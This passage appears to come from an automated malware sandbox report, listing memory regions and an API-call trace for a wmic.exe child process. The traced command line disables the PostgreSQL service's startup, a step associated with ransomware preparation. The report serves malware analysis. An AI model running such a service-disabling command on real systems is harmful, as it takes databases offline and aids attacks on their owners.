"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4257 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4258 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 286 os_tid = 0xfc8 Thread: id = 287 os_tid = 0xfcc Thread: id = 288 os_tid = 0xfd0 Process: id = "66" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x6827c000" os_pid = "0xfd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0xfbc" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4272 start_va = 0x140000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4273 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4274 start_va = 0x170000 end_va = 0x183fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 4275 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4276 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4277 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 4278 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 4279 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4280 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 4281 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 4282 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4283 start_va = 0x7edc0000 end_va = 0x7ede2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edc0000" filename = "" Region: id = 4284 start_va = 0x7ede3000 end_va = 0x7ede3fff entry_point = 0x0 region_type = private name = "private_0x000000007ede3000" filename = "" Region: id = 4285 start_va = 0x7edea000 end_va = 0x7edeafff entry_point = 0x0 region_type = private name = "private_0x000000007edea000" filename = "" Region: id = 4286 start_va = 0x7eded000 end_va = 0x7edeffff entry_point = 0x0 region_type = private name = "private_0x000000007eded000" filename = "" Region: id = 4287 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4288 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4289 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4290 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4291 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4292 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 4293 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4294 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4295 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4296 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4297 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 4298 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4299 start_va = 0x3a0000 end_va = 0x45dfff entry_point = 0x3a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4300 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4301 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4302 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4303 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4304 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4305 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4306 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4307 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4308 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4309 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4310 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4311 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4312 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4313 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4314 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4315 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4316 start_va = 0x7ecc0000 end_va = 0x7edbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecc0000" filename = "" Region: id = 4317 start_va = 0x7ede7000 end_va = 0x7ede9fff entry_point = 0x0 region_type = private name = "private_0x000000007ede7000" filename = "" Region: id = 4318 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4319 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 4320 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4321 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 4322 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4323 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4324 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4325 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4326 start_va = 0x660000 end_va = 0x996fff entry_point = 0x660000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4327 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4328 start_va = 0x4e0000 end_va = 0x5c8fff entry_point = 0x4e0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4329 start_va = 0x250000 end_va = 0x253fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 4330 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4331 start_va = 0x9a0000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4332 start_va = 0xb60000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 4333 start_va = 0x4e0000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4334 start_va = 0x9a0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4335 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 4336 start_va = 0x540000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4337 start_va = 0x9a0000 end_va = 0xa7efff entry_point = 0x9a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4338 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 4339 start_va = 0xd40000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 4340 start_va = 0x270000 end_va = 0x270fff entry_point = 0x270000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 4341 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4342 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4343 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4344 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4345 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4346 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4347 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4348 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4349 start_va = 0x4e0000 end_va = 0x509fff entry_point = 0x4e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4350 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4351 start_va = 0xb60000 end_va = 0xce7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 4352 start_va = 0xd30000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 4353 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4354 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4355 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x4e0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 4356 start_va = 0x1140000 end_va = 0x12c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 4357 start_va = 0x5370000 end_va = 0x676ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 4358 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4359 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4360 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4361 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4362 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4363 start_va = 0x540000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4364 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4365 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 4366 start_va = 0x6770000 end_va = 0x6827fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006770000" filename = "" Region: id = 4367 start_va = 0x510000 end_va = 0x513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 4368 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4369 start_va = 0x6830000 end_va = 0x692ffff entry_point = 0x0 region_type = private name = "private_0x0000000006830000" filename = "" Region: id = 4370 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4371 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4372 start_va = 0x540000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4373 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4374 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4375 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4376 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 4377 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4378 start_va = 0xcf0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 4379 start_va = 0x7ecba000 end_va = 0x7ecbcfff entry_point = 0x0 region_type = private name = "private_0x000000007ecba000" filename = "" Region: id = 4380 start_va = 0x7ecbd000 end_va = 0x7ecbffff entry_point = 0x0 region_type = private name = "private_0x000000007ecbd000" filename = "" Region: id = 4381 start_va = 0x7ede4000 end_va = 0x7ede6fff entry_point = 0x0 region_type = private name = "private_0x000000007ede4000" filename = "" Region: id = 4382 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4383 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4384 start_va = 0x620000 end_va = 0x634fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4385 start_va = 0x620000 end_va = 0x648fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Thread: id = 290 os_tid = 0xfdc [0118.528] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0118.528] __set_app_type (_Type=0x1) [0118.528] __p__fmode () returned 0x77ac4d6c [0118.528] __p__commode () returned 0x77ac5b1c [0118.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0118.528] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0118.529] ??0CHString@@QAE@XZ () returned 0x13495ec [0118.529] ??0CHString@@QAE@XZ () returned 0x13498fc [0118.529] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0118.529] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0118.529] _onexit (_Func=0x1340a20) returned 0x1340a20 [0118.529] _onexit (_Func=0x1340a30) returned 0x1340a30 [0118.529] _onexit (_Func=0x1340a50) returned 0x1340a50 [0118.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.529] ResolveDelayLoadedAPI () returned 0x770fcd50 [0118.529] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0118.531] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0118.536] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x2b1a48) returned 0x0 [0118.546] GetCurrentProcess () returned 0xffffffff [0118.546] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x20f74c | out: TokenHandle=0x20f74c*=0x158) returned 1 [0118.546] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f748 | out: TokenInformation=0x0, ReturnLength=0x20f748) returned 0 [0118.546] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x653a38, TokenInformationLength=0x118, ReturnLength=0x20f748 | out: TokenInformation=0x653a38, ReturnLength=0x20f748) returned 1 [0118.546] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x653a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0118.546] CloseHandle (hObject=0x158) returned 1 [0118.547] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.549] _vsnwprintf (in: _Buffer=0x653ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x20f6d4 | out: _Buffer="ms_409") returned 6 [0118.549] GetComputerNameW (in: lpBuffer=0x653b10, nSize=0x20f738 | out: lpBuffer="LHNIWSJ", nSize=0x20f738) returned 1 [0118.549] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.549] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.549] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0118.549] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x20f74c | out: lpNameBuffer=0x0, nSize=0x20f74c) returned 0x0 [0118.550] GetLastError () returned 0xea [0118.550] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x653b50, nSize=0x20f74c | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x20f74c) returned 0x1 [0118.550] lstrlenW (lpString="") returned 0 [0118.550] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.550] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0118.551] lstrlenW (lpString=".") returned 1 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0118.551] lstrlenW (lpString="LOCALHOST") returned 9 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 